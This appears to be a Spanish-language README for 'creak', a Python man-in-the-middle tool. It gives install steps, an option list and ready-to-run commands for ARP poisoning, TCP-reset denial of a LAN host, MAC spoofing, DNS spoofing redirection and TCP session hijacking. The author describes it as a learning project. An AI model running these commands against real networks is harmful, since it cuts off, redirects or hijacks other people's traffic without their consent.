
Envenenar, restablecer, suplantar, redirigir script MITM
Realiza algunos de los ataques MITM más famosos sobre direcciones objetivo ubicadas en una red local. Entre estos, deniega las capacidades de navegación y descarga de un host objetivo en la red local realizando un ataque de envenenamiento ARP y enviando paquetes TCP reset a cada solicitud realizada al router. Nacido como un proyecto didáctico para aprender el lenguaje Python, declino toda responsabilidad por cualquier abuso, incluido el uso malicioso o ilegal de este código.
$ git clone https://github.com/codepr/creak.git
$ cd creak
$ python setup.py install
o simplemente clone el repositorio y ejecute creak.py después de que todos los requisitos estén instalados:
$ git clone https://github.com/codepr/creak.git
Es necesario tener instaladas las bibliotecas pcap para la manipulación de paquetes en bruto y el módulo dpkt. Para las opciones de suplantación de DNS, es necesario tener instalado el módulo dnet del paquete libdnet, no lo confunda con el módulo pydnet (herramienta de evaluación de redes). También puede usar scapy si se desea, simplemente configúrelo en el archivo en la sección > .
config[output]ENGINEUsage: creak.py [options] dev
Options:
-h, --help show this help message and exit
-1, --sessions-scan Sessions scan mode
-2, --dns-spoof Dns spoofing
-3, --session-hijack Try to steal a TCP sessions by desynchronization (old technique)
-x, --spoof Spoof mode, generate a fake MAC address to be used
during attack
-m MACADDR Mac address octet prefix (could be an entire MAC
address in the form AA:BB:CC:DD:EE:FF)
-M MANUFACTURER Manufacturer of the wireless device, for retrieving a
manufactur based prefix for MAC spoof
-s SOURCE Source ip address (e.g. a class C address like
192.168.1.150) usually the router address
-t TARGET Target ip address (e.g. a class C address like
192.168.1.150), can be specified multiple times
-p PORT Target port to shutdown
-a HOST Target host that will be redirect while navigating on
target machine
-r REDIR Target redirection that will be fetched instead of host
on the target machine
-v, --verbose Verbose output mode
-d, --dotted Dotted output mode
Uso más básico: Denegar todo el tráfico al host objetivo
$ python creak.py -t 192.168.1.30 wlan0
Establecer una puerta de enlace diferente:
$ python creak.py -s 192.168.1.2 -t 192.168.1.30 wlan0
Establecer una dirección MAC diferente para el dispositivo:
$ python creak.py -m 00:11:22:33:44:55 -t 192.168.1.30 wlan0
Suplantar la dirección MAC generando una falsa:
$ python creak.py -x -t 192.168.1.30 wlan0
Suplantar la dirección MAC generando una basada en el fabricante (ej. Xeros):
$ python creak.py -x -M xeros -t 192.168.1.30 wlan0
Suplantación de DNS usando una dirección MAC falsa, redirigiendo ab.xy a cd.xz (por ejemplo, localhost):
$ python creak.py -x -M xeros -t 192.168.1.30 -a www.ab.xy -r www.cd.xz wlan0
Denegar múltiples hosts en la subred:
$ python creak.py -x -t 192.168.1.30 -t 192.168.1.31 -t 192.168.1.32 wlan0
Consulte el archivo CHANGELOG.
Scapy (iniciado)Consulte el archivo LICENSE para conocer los derechos y limitaciones de la licencia (GNU v3).